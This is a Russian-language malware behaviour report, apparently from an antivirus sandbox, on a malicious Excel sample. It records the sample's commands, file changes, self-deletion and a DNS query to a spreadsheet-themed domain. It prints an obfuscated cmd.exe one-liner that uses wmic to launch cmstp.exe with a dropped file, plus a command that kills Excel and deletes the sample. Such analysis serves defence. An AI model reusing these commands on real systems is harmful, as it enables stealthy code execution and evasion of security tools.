Техническая информация
Вредоносные функции
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /f /im excel.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /v /c set h3=times& call set q0=%h3:~0,1%& call set y8=%h3:~1,1%& s!q0!art /min "" wm!y8!c process call crea!q0!e "cms!q0!p /ns /s /su %HOMEPATH%\Documents\24.txt"
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im excel.exe & ping 127.0.0.1 -n 3 & del "<PATH_SAMPLE>.xls"
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\documents\24.txt
- %WINDIR%\temp\old9d4b.tmp
- %WINDIR%\security\logs\scecomp.log
- %APPDATA%\microsoft\network\connections\cm\ .cmp
Удаляет следующие файлы
- %HOMEPATH%\documents\24.txt
- %WINDIR%\temp\old9d4b.tmp
Самоудаляется.
Сетевая активность
UDP
- DNS ASK do######.share-spreadsheet.com
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /v /c set h3=times& call set q0=%h3:~0,1%& call set y8=%h3:~1,1%& s!q0!art /min "" wm!y8!c process call crea!q0!e "cms!q0!p /ns /s /su %HOMEPATH%\Documents\24.txt"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im excel.exe & ping 127.0.0.1 -n 3 & del "<PATH_SAMPLE>.xls"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\wbem\wmic.exe' process call create "cmstp /ns /s /su %HOMEPATH%\Documents\24.txt"
- '<SYSTEM32>\cmstp.exe' /ns /s /su %HOMEPATH%\Documents\24.txt
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 3
